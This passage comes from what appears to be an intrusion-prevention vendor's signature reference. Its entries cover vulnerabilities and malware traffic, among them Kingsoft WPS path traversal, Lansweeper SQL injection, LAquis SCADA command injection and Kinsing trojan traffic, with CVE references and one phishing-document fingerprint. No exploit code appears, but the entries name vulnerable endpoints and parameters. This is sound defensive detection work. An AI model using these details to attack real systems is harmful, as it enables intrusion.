A path traversal vulnerability in Kingsoft WPS Office allows loading of arbitrary Windows libraries. An unauthenticated attacker can leverage this vulnerability for remote code execution by enticing a user into clicking a link in a maliciously crafted document.

Situation:

File-Text_Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262
File-TextId_Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262

References:

CVE-2024-7262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7262

Kingsoft-Writer-Font-Names-Buffer-Overflow

About this vulnerability:

A vulnerability in Beijing Kingsoft Kingsoft Writer

Risk:

High

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Kingsoft Writer

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in Kingsoft Writer. The vulnerability is due to an error while handling font names in WPS or Office word files. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a malicious file with a vulnerable version of the application. This can lead to code execution in the context of the affected user.

Situation:

File-OLE_Kingsoft-Writer-Font-Names-Buffer-Overflow

References:

CVE-2013-3934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3934

BID-61796
http://www.securityfocus.com/bid/61796

OSVDB-96312
http://www.osvdb.org/96312

Kinsing-Linux-Trojan-Infection-Traffic

About this vulnerability:	Kinsing trojan infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1354-5242
Last changed:	sgpkg-ips-1354-5242
Platform:	Linux
Software:	<os>
Type:	Backdoor
Description:	Kinsing trojan infection traffic detected.
Situation:	HTTP_CRH-Kinsing-Linux-Trojan-Infection-Traffic

Klog-Server-authenticate.php-User-Unauthenticated-Command-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Klog Server

Risk:

High

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

Linux

Software:

Klog Server

Type:

Input Validation

Description:

There exists a vulberability in Klog Server, versions 2.4.1 and prior, which allows remote attackers to execute arbitrary code via the user parameter in a POST to authenticate.php, due to insufficient user input validation.

Situation:

HTTP_CRL-Klog-Server-authenticate.php-User-Unauthenticated-Command-Injection

References:

CVE-2020-35729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35729

Known-APT-Traffic

About this vulnerability:	Traffic pattern associated with Advanced Persisten Threats
Risk:	High
First detected in:	sgpkg-ips-1007-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	This vulnerability refers to a number of situations that detect traffic patterns associated with Advanced Persistent Threats (APT's).
Situation:	HTTP_CS-Suspected-APT-Traffic-Pattern HTTP_CSU-Suspected-APT-Traffic-Pattern HTTP_CRL-Suspected-APT-Traffic-Pattern SMB-TCP_CS_Suspected-APT-Traffic-Pattern SMB-TCP_SHS-NTLM-Authentication-Usage

Known-Phishing-Word-Documents

About this vulnerability:	An attempt to exploit a vulnerability in Microsoft Word detected
Risk:	High
First detected in:	sgpkg-ips-1806-5242
Last changed:	sgpkg-ips-1806-5242
Platform:	Windows
Software:	Microsoft Word
Type:	Input Validation
Description:	In a recent phishing campaign, the attacker abuses Microsofts Word's file recovery feature by sending corrupted Word documents as email attachments. This allows them to bypass security software due to their damaged state but still be recoverable by the application. The documents in this campaign all include the base64 encoded string "IyNURVhUTlVNUkFORE9NNDUjIw". This fingerprint detects such documents.
Situation:	File-Name_Known-Phishing-Word-Documents

Knox-Arkeia-Network-Backup-Server-Type77-Stack-BOF

About this vulnerability:

Buffer overflow in Arkeia Network Backup Server

Risk:

High

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Arkeia Network Backup

Type:

Buffer Overflow

Description:

Arkeia Network Backup Server contains a stack-based buffer overflow vulnerability caused by insufficient bounds checking when handling type 77 requests. A remote attacker could exploit this to execute arbitrary code on the server.

Situation:

Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-1
Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-2
Generic_Arkeia-Network-Backup-Server-Type77-Stack-BOF-3
Generic_CS-Arkeia-Network-Backup-Server-Buffer-Overflow

References:

CVE-2005-0491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0491

BID-12594
http://www.securityfocus.com/bid/12594

Kodi-Local-File-Inclusion

About this vulnerability:

A Kodi Local File Inclusion vulnerability

Risk:

High

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux; Mac OS X; Android

Software:

Kodi

Type:

Directory Traversal

Description:

A vulnerability in Kodi, versions before 17.1, which allows remote attackers to read arbitrary files via the image path in the URI.

Situation:

HTTP_URI-Kodi-Local-File-Inclusion

References:

CVE-2017-5982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5982

Kong-Gateway-Admin-API-Remote-Code-Execution

About this vulnerability:	A vulnerability in Kong Gateway.
Risk:	High
First detected in:	sgpkg-ips-1368-5242
Last changed:	sgpkg-ips-1368-5242
Platform:	Linux; OS X
Software:	Kong Gateway
Type:	Input Validation
Description:	A vulnerability in Kong Gateway which allows remote attackers to execute arbitrary commands by allowing the creation of a route and serverless function plugin which is used to run the command using os.execute().
Situation:	HTTP_CRL-Kong-Gateway-Admin-API-Remote-Code-Execution

Konica-Minolta-FTP-Utility-Directory-Traversal

About this vulnerability:

A Konica Minolta FTP Utility Directory Traversal vulnerability

Risk:

High

First detected in:

sgpkg-ips-774-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Konica Minolta FTP Utility

Type:

Directory Traversal

Description:

A vulnerability in Konica Minolta FTP Utility, version 1.0, which allows remote attackers to read arbitrary files via a ../ directory traversal in the RETR command.

Situation:

FTP_CS-Attempted-FTP-Directory-Traversal

References:

CVE-2015-7603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7603

Konqueror-FTP-Iframe-Null-Pointer-Dereference-DoS

About this vulnerability:

Konqueror FTP Iframe Null Pointer Dereference DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-671-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Konqueror

Type:

Browser

Description:

A vulnerability exists in Konqueror in KDE 3.5.5 which allows remote attackers to cause a denial of service condition by setting the src attribute of an iframe to an ftp:// URL.

Situation:

File-Text_Konqueror-FTP-Iframe-Null-Pointer-Dereference-DoS

References:

CVE-2007-1308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1308

BID-22814
http://www.securityfocus.com/bid/22814

OSVDB-34084
http://www.osvdb.org/34084

Konqueror-Same-Origin-Policy-Bypass

About this vulnerability:

Cross-site scripting vulnerability in Konqueror

Risk:

Moderate

First detected in:

sgpkg-ips-156-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Konqueror

Type:

Cross-site Scripting

Description:

There is a cross site scripting vulnerability in Konqueror. The vulnerability allows bypassing of the same origin policy enforced by the browser, leading to unauthorized access to sensitive information of another web site such as authentication cookies.

Situation:

HTTP_SS-Same-Origin-Policy-Bypass
File-Text_Same-Origin-Policy-Bypass

References:

CVE-2002-1151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1151

BID-5689
http://www.securityfocus.com/bid/5689

OSVDB-7867
http://www.osvdb.org/7867

Koobface-Bot

About this vulnerability:	Koobface Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Koobface is a worm that tries to collect login information for various sites from the infected machine.
Situation:	HTTP_CSU-Koobface-Bot-Traffic

Korenix-Jetwave-Command-Injection-CVE-2023-23294

About this vulnerability:

A vulnerability in Korenix JetWave

Risk:

High

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Generic

Software:

Korenix JetWave

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the firmware of Korenix JetWave 4200 Series 1.3.0 and JetWave 3000 Series 1.6.0 wireless access points. An authenticated attacker can use this vulnerability to execute arbitrary OS commands via a maliciously crafted file_name parameter value.

Situation:

HTTP_CRL-Korenix-Jetwave-Command-Injection-CVE-2023-23294

References:

CVE-2023-23294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23294

KPOT-Stealer-Traffic

About this vulnerability:	KPOT Stealer traffic
Risk:	High
First detected in:	sgpkg-ips-1254-5242
Last changed:	sgpkg-ips-1758-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	KPOT is an information stealer malware.
Situation:	HTTP_CS-KPOT-Stealer-Traffic

Kramer-Viaware-Remote-Code-Execution-CVE-2021-35064

About this vulnerability:

A vulnerability in Kramer VIAware

Risk:

High

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Generic

Software:

VIAware

Type:

Misconfiguration

Description:

A remote code execution vulnerability has been reported in the Kramer VIAware software. A successful exploitation of this vulnerability can allow an unauthenticated attacker to gain root privileges due to a sudoers misconfiguration.

Situation:

HTTP_CRL-Kramer-Viaware-Remote-Code-Execution-CVE-2021-35064

References:

CVE-2021-35064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35064

Kronos-Botnet

About this vulnerability:	Kronos botnet
Risk:	High
First detected in:	sgpkg-ips-760-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Kronos is a malicious botnet which poses a serious threat to Internet users. Most notably, Kronos engages in trojan activity as an information stealer and web proxy. In addition, it may download further malicious modules. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation:	File-Binary_Kronos-Botnet-Traffic

Ksmbd-Tools-Ksmbd.Mountd-Ndr_write_bytes-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in ksmdb-tools
Risk:	Moderate
First detected in:	sgpkg-ips-1657-5242
Last changed:	sgpkg-ips-1657-5242
Platform:	Generic
Software:	Canonical ksmdb-tools
Type:	Buffer Overflow
Description:	Insufficient validation of the RPC WKSSVC requests submitted to ksmbd.mountd daemon causes a heap buffer overflow, which can be exploited to run code as root on the target system.
Situation:	MSRPC-TCP_CPS-Ksmbd-Tools-Ksmbd.Mountd-Ndr_write_bytes-Heap-Buffer-Overflow

Kubernetes-API-Proxy-Request-Handling-Privilege-Escalation

About this vulnerability:

A vulnerability in Kubernetes Kubernetes

Risk:

Moderate

First detected in:

sgpkg-ips-1123-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Kubernetes

Type:

Malfunction

Description:

Insufficient handling of error conditions from backend servers causes a privilege escalation vulnerability in Kubernetes. A successful exploit allows an attacker to gain full administrative privileges on the cluster.

Situation:

HTTP_CS-Kubernetes-API-Proxy-Request-Handling-Privilege-Escalation

References:

CVE-2018-1002105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1002105

Kubernetes-Authenticated-Code-Execution

About this vulnerability:	A vulnerability in Kubernetes.
Risk:	High
First detected in:	sgpkg-ips-1404-5242
Last changed:	sgpkg-ips-1404-5242
Platform:	Linux; Unix
Software:	Kubernetes
Type:	Misconfiguration
Description:	A vulnerability in Kubernetes which allows for unauthenticated remote code execution.
Situation:	HTTP_CSU-Kubernetes-Authenticated-Code-Execution

Kubernetes-Dashboard-Authentication-Bypass-Information-Disclosure

About this vulnerability:

A vulnerability in Kubernetes Dashboard

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Kubernetes

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in Kubernetes Dashboard. The vulnerability is due to a design weakness that allows a user to view a secret object. A remote attacker can exploit this vulnerability by sending a crafted request to a vulnerable Kubernetes Dashboard server. Successful exploitation could result in the attackers gaining access to Kubernetes cluster secrets and other sensitive information.

Situation:

HTTP_CSU-Kubernetes-Dashboard-Authentication-Bypass-Information-Disclosure

References:

CVE-2018-18264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18264

LabStore-SQL-Injection

About this vulnerability:

A vulnerability in LabStore

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LabStore

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in all LabStore versions until 1.5.4.

Situation:

HTTP_CRL-LabStore-SQL-Injection

References:

BID-50551
http://www.securityfocus.com/bid/50551

Labview-Web-Server-Denial-Of-Service

About this vulnerability:	A vulnerability in Labview Web Server
Risk:	High
First detected in:	sgpkg-ips-612-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows;Linux
Software:	Labview Server
Type:	Malfunction
Description:	A vulnerability exists in Labview Web Server. An attacker could send a custom HTTP request causing a denial of service condition, crashing Labview.
Situation:	HTTP_CS-Labview-Web-Server-Denial-Of-Service

LANDesk-Management-Suite-Amtversion-Cross-Site-Scripting

About this vulnerability:

A vulnerability in LANDesk Management Suite

Risk:

Moderate

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LANDesk Management Suite

Type:

Input Validation

Description:

A cross-site scripting vulnerability exists in LANDesk Management Suite. The vulnerability is due to improper validation of a user-supplied parameter AMTVersion. A remote attacker could exploit this vulnerability by enticing a target user to view crafted web content. A successful attack may result in the execution of script code in the target user's browser.

Situation:

HTTP_CRL-LANDesk-Management-Suite-Amtversion-Cross-Site-Scripting

References:

CVE-2014-5360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5360

BID-72450
http://www.securityfocus.com/bid/72450

OSVDB-117878
http://www.osvdb.org/117878

LANDesk-Management-Suite-Frm_splitfrm-Remote-File-Inclusion

About this vulnerability:

A vulnerability in LANDesk Management Suite

Risk:

Moderate

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LANDesk Management Suite

Type:

Input Validation

Description:

A remote file inclusion vulnerability has been reported in LANDesk Management Suite. The vulnerability is due to insufficient input validation in /remote/frm_splitfrm.aspx. A remote attacker could exploit the remote file inclusion vulnerability by enticing a user to click on a link with a maliciously crafted top parameter. Successful exploitation could lead to arbitrary script code execution in the browser of the target user.

Situation:

HTTP_CRL-LANDesk-Management-Suite-Frm_splitfrm-Remote-File-Inclusion

References:

CVE-2014-5362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362

LANDesk-Management-Suite-Qip-Service-Heal-Packet-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in LANDesk Management Suite

Risk:

High

First detected in:

sgpkg-ips-224-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

LANDesk Management Suite

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in LANDesk QIP service. The vulnerability is due to insufficient validation when processing specially crafted heal requests. A remote unauthenticated attacker can leverage this vulnerability to inject and execute arbitrary code on the target host with System level privileges.

Situation:

Generic_CS-LANDesk-Management-Suite-Qip-Service-Heal-Packet-Buffer-Overflow

References:

CVE-2008-2468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2468

BID-31193
http://www.securityfocus.com/bid/31193

LANDesk-Management-Suite-Remote-File-Inclusion

About this vulnerability:

A vulnerability in LANDesk Management Suite

Risk:

High

First detected in:

sgpkg-ips-658-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LANDesk Management Suite

Type:

Input Validation

Description:

A remote file inclusion vulnerability has been reported in LANDesk Management Suite. The vulnerability is due to insufficient input validation in /remote/frm_coremainfrm.aspx and /ldms/sm_actionfrm.asp. A remote unauthenticated attacker could exploit the remote file inclusion vulnerability by enticing a user to click on a link with a maliciously crafted d parameter. Successful exploitation could lead to arbitrary code execution under the security context of the browser.

Situation:

HTTP_CRL-LANDesk-Management-Suite-Remote-File-Inclusion

References:

CVE-2014-5362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362

LANDesk-ThinkManagement-Suite-ServerSetup.asmx-Directory-Traversal

About this vulnerability:

A vulnerability in LANDesk Lenovo ThinkManagement Suite

Risk:

Moderate

First detected in:

sgpkg-ips-448-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LANDesk Lenovo ThinkManagement Suite

Type:

Directory Traversal

Description:

There is a directory traversal vulnerability in LANDesk ThinkManagement Suite. The vulnerability is due to insufficient validation of user input while processing requests sent to ServerSetup.asmx. By specifying a RunAMTCommand operation, remote, unauthenticated attackers are able to create arbitrary files on the server and execute arbitrary code from the uploaded file.

Situation:

HTTP_CS-LANDesk-ThinkManagement-Suite-ServerSetup.asmx-Directory-Traversal

References:

CVE-2012-1195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1195

BID-52023
http://www.securityfocus.com/bid/52023

OSVDB-79276
http://www.osvdb.org/79276

LANDesk-ThinkManagement-Suite-SetTaskLogByFile-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in LANDesk Lenovo ThinkManagement Suite

Risk:

Moderate

First detected in:

sgpkg-ips-449-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LANDesk Lenovo ThinkManagement Suite

Type:

Directory Traversal

Description:

There is a directory traversal vulnerability in LANDesk ThinkManagement Suite. The vulnerability is due to insufficient validation of user input while processing requests sent to "VulCore.asmx". By specifying the 'SetTaskLogByFile' operation, remote unauthenticated attackers will be able to delete arbitrary files on the server. The vendor, LANDesk, has not released any advisory regarding this vulnerability.

Situation:

HTTP_CS-LANDesk-ThinkManagement-Suite-SetTaskLogByFile-Arbitrary-File-Deletion

References:

CVE-2012-1196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1196

BID-52023
http://www.securityfocus.com/bid/52023

OSVDB-79277
http://www.osvdb.org/79277

Langflow-AI-RCE-CVE-2025-3248

About this vulnerability:

A vulnerability in Langflow AI

Risk:

High

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Langflow AI

Type:

Input Validation

Description:

An vulnerability in Langflow AI, versions before 1.3.0, which allows remote attackers to execute arbitrary Python code with the use of decorators and default arguments via the /api/v1/validate/code endpoint.

Situation:

HTTP_CRL-Langflow-AI-RCE-CVE-2025-3248

References:

CVE-2025-3248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-3248

Lansweeper-Assetactions-Directory-Traversal

About this vulnerability:

A vulnerability in Lansweeper lansweeper

Risk:

Moderate

First detected in:

sgpkg-ips-1546-5242

Last changed:

sgpkg-ips-1546-5242

Platform:

Generic

Software:

Lansweeper

Type:

Directory Traversal

Description:

Insufficient sanitation of the txtdocname parameter when uploading files causes directory traversal vulnerability in Lansweeper. A successful exploitation allows an attacker to overwrite arbitrary files on the target system.

Situation:

HTTP_CS-Lansweeper-Assetactions-Directory-Traversal

References:

CVE-2022-32573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32573

Lansweeper-Assetactions-SQL-Injection

About this vulnerability:

A vulnerability in Lansweeper

Risk:

Moderate

First detected in:

sgpkg-ips-1459-5242

Last changed:

sgpkg-ips-1459-5242

Platform:

Generic

Software:

Lansweeper

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Lansweeper. The vulnerability is due to insufficient input validation. A remote, authenticated attacker can exploit these vulnerabilities by sending a crafted request to the target system. Successful exploitation results in SQL command execution under the security context of the database process.

Situation:

HTTP_CRL-Lansweeper-Assetactions-SQL-Injection

References:

CVE-2022-21210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21210

Lansweeper-Getassetsbygroupid-SQL-Injection

About this vulnerability:

A vulnerability in Lansweeper lansweeper

Risk:

Moderate

First detected in:

sgpkg-ips-1445-5242

Last changed:

sgpkg-ips-1445-5242

Platform:

Generic

Software:

Lansweeper

Type:

Input Validation

Description:

Insufficient input validation when handling incoming requests causes an SQL injection vulnerability in Lansweeper. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Lansweeper-Getassetsbygroupid-SQL-Injection

References:

CVE-2022-21234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21234

Lansweeper-Helpdeskactions.aspx-Edittemplate-Directory-Traversal

About this vulnerability:

A vulnerability in Lansweeper

Risk:

Moderate

First detected in:

sgpkg-ips-1554-5242

Last changed:

sgpkg-ips-1554-5242

Platform:

Generic

Software:

Lansweeper

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Lansweeper. The vulnerability is due to insufficient sanitation of inline attachment names when editing templates. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in arbitrary file writes on the target system.

Situation:

HTTP_CRL-Lansweeper-Helpdeskactions.aspx-Edittemplate-Directory-Traversal

References:

CVE-2022-29517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29517

Lansweeper-Helpdesksetupactions-SQL-Injection

About this vulnerability:

A vulnerability in Lansweeper

Risk:

Moderate

First detected in:

sgpkg-ips-1457-5242

Last changed:

sgpkg-ips-1457-5242

Platform:

Generic

Software:

Lansweeper

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Lansweeper. The vulnerability is due to insufficient input validation. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation can result in remote code execution under the database service.

Situation:

HTTP_CRL-Lansweeper-Helpdesksetupactions-SQL-Injection

References:

CVE-2022-22149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22149

Lansweeper-Tickettemplateactions.aspx-Directory-Traversal

About this vulnerability:

A vulnerability in Lansweeper

Risk:

Moderate

First detected in:

sgpkg-ips-1544-5242

Last changed:

sgpkg-ips-1546-5242

Platform:

Generic

Software:

Lansweeper

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Lansweeper. The vulnerability is due to insufficient sanitation of the fileuid parameter when retrieving ticket template files. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in arbitrary file reads on the target system.

Situation:

HTTP_CSU-Lansweeper-Tickettemplateactions.aspx-Directory-Traversal

References:

CVE-2022-27498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27498

Lansweeper-Webuseractions-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Lansweeper lansweeper

Risk:

Moderate

First detected in:

sgpkg-ips-1451-5242

Last changed:

sgpkg-ips-1451-5242

Platform:

Generic

Software:

Lansweeper

Type:

Input Validation

Description:

Insufficient sanitization of the loginmessage and loginfootertext parameters in user-sent requests causes a cross-site scripting vulnerability in Lansweeper. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Lansweeper-Webuseractions-Stored-Cross-Site-Scripting

References:

CVE-2022-21145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21145

Lantronix-Premierwave-Command-Injection-CVE-2021-21881

About this vulnerability:

A vulnerability in Lantronix PremierWave 2050

Risk:

High

First detected in:

sgpkg-ips-1501-5242

Last changed:

sgpkg-ips-1501-5242

Platform:

Generic

Software:

Lantronix PremierWave

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Lantronix PremierWave 2050. An authenticated attacker could use this vulnerability to execute arbitrary OS commands.

Situation:

HTTP_CRL-Lantronix-Premierwave-Command-Injection-CVE-2021-21881

References:

CVE-2021-21881
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21881

Laquis-SCADA-LGX-Report-Addcombofile-Arbitrary-File-Write

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

Moderate

First detected in:

sgpkg-ips-1801-5242

Last changed:

sgpkg-ips-1801-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Directory Traversal

Description:

Insufficient user input validation upon loading an LGX file and processing AddComboFile script function causes an arbitrary file write vulnerability in LAquis LGX. A successful exploitation allows an attacker to overwrite files on the target system and potentially execute them.

Situation:

File-Binary_Laquis-SCADA-LGX-Report-Addcombofile-Arbitrary-File-Write

References:

CVE-2024-5040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5040

Laquis-SCADA-LGX-Report-Arbitrary-File-Write

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

High

First detected in:

sgpkg-ips-1167-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Input Validation

Description:

A vulnerability in LAquis SCADA, versions prior to 4.1.0.4150, which allows remote attackers to write arbitrary files and possible execute arbitrary code by enticing a user to open a maliciously crafted LGX report.

Situation:

File-Binary_Laquis-SCADA-LGX-Report-Arbitrary-File-Write

References:

CVE-2018-18988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18988

Laquis-Scada-LGX-Report-File-Parsing-Out-of-Bounds-Write

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

Moderate

First detected in:

sgpkg-ips-1172-5242

Last changed:

sgpkg-ips-1706-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Malfunction

Description:

There has been reported an out-of-bounds write vulnerability in the LAquis SCADA. This vulnerability could be exploited by opening a maliciously crafted report file. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Binary_Laquis-Scada-LGX-Report-File-Parsing-Out-of-Bounds-Write

References:

CVE-2018-18986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18986

Laquis-SCADA-LGX-Report-String-Writetofile-Arbitrary-File-Write

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

Moderate

First detected in:

sgpkg-ips-1790-5242

Last changed:

sgpkg-ips-1790-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Directory Traversal

Description:

Insufficient user input validation while processing String Writetofile script function in an LGX file causes an arbitrary write vulnerability in LAquis SCADA. A successful exploitation allows an attacker to write data and possibly execute arbitrary code on the target system.

Situation:

File-Binary_Laquis-SCADA-LGX-Report-String-Writetofile-Arbitrary-File-Write

References:

CVE-2024-5040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5040

Laquis-Scada-LGX-Report-Table-Save-Arbitrary-File-Write

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

Moderate

First detected in:

sgpkg-ips-1784-5242

Last changed:

sgpkg-ips-1784-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Directory Traversal

Description:

Insufficient user input validation upon loading an LGX file and processing Table Save script functio causes an arbitrary file write vulnerability in LAquis SCADA. A successful exploitation allows an attacker to write arbitrary files on the target system and execute code on it.

Situation:

File-Binary_Laquis-Scada-LGX-Report-Table-Save-Arbitrary-File-Write

References:

CVE-2024-5040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5040

Laquis-Scada-Web-Server-Acompanhamentotela-Tagaltere-Command-Injection

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

Moderate

First detected in:

sgpkg-ips-1174-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Input Validation

Description:

Improper handling of URI parameters sent to the acompanhamentotela.lhtml page causes a command injection vulnerability in LAquis SCADA. A successful exploit allows an attacker to execute arbitrary code with the privileges of the server process.

Situation:

HTTP_CSU-Laquis-Scada-Web-Server-Acompanhamentotela-Tagaltere-Command-Injection

References:

CVE-2018-18992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18992

Laquis-Scada-Web-Server-Directory-Traversal

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

Moderate

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in LAquis SCADA. This vulnerability could be exploited remotely and without authentication. Succesful exploitation can result in information disclosure.

Situation:

HTTP_CSU-Potential-Dot-Dot-Slash-Directory-Traversal

References:

CVE-2018-18990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18990

Laquis-Scada-Web-Server-Relatorioindividual-Tag-Code-Injection

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

Moderate

First detected in:

sgpkg-ips-1163-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Input Validation

Description:

There has been reported a code injection vulnerability in LAquis SCADA. This vulnerability could be exploited by a remote attacker sending crafted request to the target server. Successful exploitation may lead in arbitrary code execution.

Situation:

HTTP_CRL-Laquis-Scada-Web-Server-Relatorioindividual-Tag-Code-Injection

References:

CVE-2018-18992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18992

Laquis-Scada-Web-Server-Relatorioindividual-Titulo-Command-Injection

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Input Validation

Description:

Improper handling of specific parameters submitted in requests to the relatorioindividual.lhtml page causes a command injection vulnerability in LAquis SCADA. A successful exploit allows an attacker to run arbitrary commands with the privileges of the web server.

Situation:

HTTP_CRL-Laquis-Scada-Web-Server-Relatorioindividual-Titulo-Command-Injection

References:

CVE-2018-18992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18992

Laquis-Scada-Web-Server-Relatorionome-Nome-Command-Injection

About this vulnerability:

A vulnerability in LAquis SCADA

Risk:

Moderate

First detected in:

sgpkg-ips-1138-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LAquis SCADA

Type:

Input Validation

Description:

Improper handling of specific parameters submitted in requests to the relatorionome.lhtml page causes a command injection vulnerability in LAquis SCADA. A successful exploit allows an attacker to run arbitrary commands with the privileges of the web server.

Situation:

